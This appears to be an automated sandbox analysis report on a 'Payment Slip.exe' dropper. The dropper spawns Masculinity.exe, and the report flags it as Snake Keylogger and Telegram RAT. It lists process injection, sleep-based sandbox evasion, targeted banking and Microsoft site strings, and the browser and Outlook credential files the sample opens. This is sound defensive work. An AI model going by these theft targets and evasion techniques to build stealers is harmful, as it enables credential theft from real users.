Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040276E FindFirstFileW,	7_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040622B FindFirstFileW,FindClose,	7_2_0040622B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Payment Slip.exe	API call chain: ExitProcess graph end node			graph_0-3516
Source: C:\Users\user\Desktop\Payment Slip.exe	API call chain: ExitProcess graph end node			graph_0-3515

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Code function: 7_2_04A69590 LdrInitializeThunk,

7_2_04A69590

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 1700000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Masculinity.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	111 Process Injection	2 Obfuscated Files or Information	LSASS Memory	116 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	211 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Slip.exe	32%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Masculinity.exe	32%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
